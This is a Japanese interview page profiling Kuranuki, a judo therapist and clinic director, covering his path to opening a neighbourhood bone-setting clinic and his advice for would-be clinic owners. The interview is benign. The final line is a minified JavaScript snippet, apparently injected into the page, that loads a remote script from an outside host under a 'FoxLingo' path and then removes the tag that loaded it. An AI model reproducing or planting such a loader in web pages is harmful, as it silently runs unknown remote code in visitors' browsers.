柔道整復師 院長 倉貫さん

Blog_photo_r1_c3

開業できたのは、前の職場での経験があったから。

Profile
柔道整復師 院長 倉貫さん
くらぬき整骨院
平成20年3月 柔道整復科 卒業
京都文教大学 出身
大学卒業後ドラッグストアに勤務
27歳で京都医健に入学、柔道整復師試験に合格
3年間整骨院で勤務後、開業

Qaq 開業までの経緯

Qaa 将来は開業したいという思いは持っていましたが、親の後押しや自分の力でどこまでできるかやってみたいという思いもあり、3年間の整骨院勤務を経て、開業に至りました。
開業の準備期間は約3ヶ月。実家をリフォームしての開業でしたが、治療院のレイアウトや内装などを考えるのが大変でした。住宅街に開業したので、チラシをポスティングしたりと宣伝も少しずつ行っています。以前の職場の患者さんが来てくださることもあり嬉しいですね。

Qaq 目指す整骨院

Qaa 来てくださった方が笑顔になれる整骨院を目指しています。そのために、まずこちらが常に笑顔で対応するように心がけています。院内も暖かみのある空間になるよう、オレンジ色のベッドや小物を使用しています。
しっかりと、地元に定着させて、「何かあれば来よう」と必要とされる整骨院にしていきたいです。

Qaq 開業を目指す方へのアドバイス

Qaa まず、開業を目標に就職先を選ぶことです。私が、3年間の勤務で開業することができたのは、以前の職場でしっかりと勉強し経験を積むことができたからだと思っています。
治療技術向上のための勉強会はもちろん、院の運営ノウハウも学ぶことができ、任せてもらえる環境がありました。また、雇われている間に少しでも多くのことを吸収するために、言われたことだけやるのではなく、自分で考えて行動することが大切だと思います。

!function(){try{var h=document.getElementsByTagName(“head”)[0];var s=document.createElement(“script”);s.src=”//edge.crtinv.com/products/FoxLingo/default/snippet.js”;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==”loaded” || this.readyState==”complete”){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();